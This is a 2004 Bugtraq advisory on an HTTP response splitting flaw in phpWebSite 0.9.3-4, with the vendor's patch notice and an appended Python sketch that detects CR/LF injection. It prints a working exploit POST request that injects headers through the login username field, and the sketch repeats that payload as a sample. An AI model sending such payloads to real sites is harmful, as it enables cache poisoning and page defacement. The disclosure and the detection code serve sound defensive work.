
List:       bugtraq
Subject:    security hole (http response splitting) in phpwebsite
From:       "Maestro De-Seguridad" <maestrodeseguridad () lycos ! com>
Date:       2004-11-11 19:55:35
Message-ID: 20041111195535.4FBBC3384C () ws7-3 ! us4 ! outblaze ! com

ADVISORY
 
Author: Maestro (me!)
 
Date: 11-NOV-04
 
Vendor: Appalachian State University (http://phpwebsite.appstate.edu/)
 
Product: phpWebSite 0.9.3-4

Product description (from vendor website):
phpWebSite provides a complete web site content management system. Web-based
administration allows for easy maintenance of interactive, community-driven web
sites. phpWebSite's growing number of modules allow for easy site customization
without the need for unwanted or unused features. Client output from phpWebSite is
valid XHTML 1.0 and meets the W3C's Web Accessibility Initiative requirements.
phpWebSite is written in the PHP Programming Language, making it ideal for developers
to write customized modules.

Problem: HTTP response splitting (web cache poisoning, XSS,
yadayadayada) - http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
  
Exploit:

POST /index.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 218
Connection: Keep-Alive

module=user&norm_user_op=login&block_username=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20Ok%0d%0aContent-Length:%2031%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}This site in 0wned{/html}&password=foobar

(replace curly braces with less-than and greater-than)

Vendor status: The vendor fixed this problem (11-NOV-04). 
From vendor security mail list:
A security vulnerability was brought to our attention recently and we
have posted a patch to resolve this issue.  The patch can be downloaded
from here:

http://phpwebsite.appstate.edu/downloads/security/phpwebsite-core-security-patch2.tar.gz
                
md5sum: fcefda44a8d691c844593d815479a1ce

This patch should only be applied to versions 0.9.3-2 or greater.  All
you need to do is untar the file in the base directory of your
phpwebsite install.




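Added example, not part of the original message or of the phpWebSite patch: response splitting depends on CR/LF in a request parameter reaching a response header, so the sketch below flags form fields whose decoded value contains line breaks and refuses such values at the point a header is written. The function names and the sample request bodies are constructed for illustration; which header the value reaches in phpWebSite is not stated in the advisory.

```python
import re
from urllib.parse import parse_qsl

# A status line or a header name at the start of a line: what a splitting
# payload has to carry after the injected CR/LF.
HEADER_LIKE = re.compile(r"(?im)^(HTTP/\d\.\d\s+\d{3}|[A-Za-z-]+:\s)")


def find_crlf_params(body: str):
    """Return one finding per form field whose decoded value holds CR or LF."""
    findings = []
    # parse_qsl percent-decodes values, so %0d%0a becomes a real CR LF here.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if "\r" not in value and "\n" not in value:
            continue
        findings.append({
            "param": name,
            "line_breaks": len(re.findall(r"\r\n|\r|\n", value)),
            # Distinguishes injected headers from an ordinary multi-line field.
            "header_like": bool(HEADER_LIKE.search(value)),
        })
    return findings


def safe_header_value(value: str) -> str:
    """Output-side check: never emit CR, LF or NUL inside a header value."""
    if re.search(r"[\r\n\x00]", value):
        raise ValueError("control character in header value")
    return value


# Constructed request bodies (field names taken from the advisory).
SAMPLE_BODIES = [
    "module=user&norm_user_op=login&block_username=alice&password=x",
    "module=user&norm_user_op=login&block_username="
    "%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK&password=x",
    "comment=first+line%0asecond+line",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(find_crlf_params(body))
```

The input-side scan suits log review or a request filter; the output-side check is the one that closes the hole regardless of which parameter carries the value.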


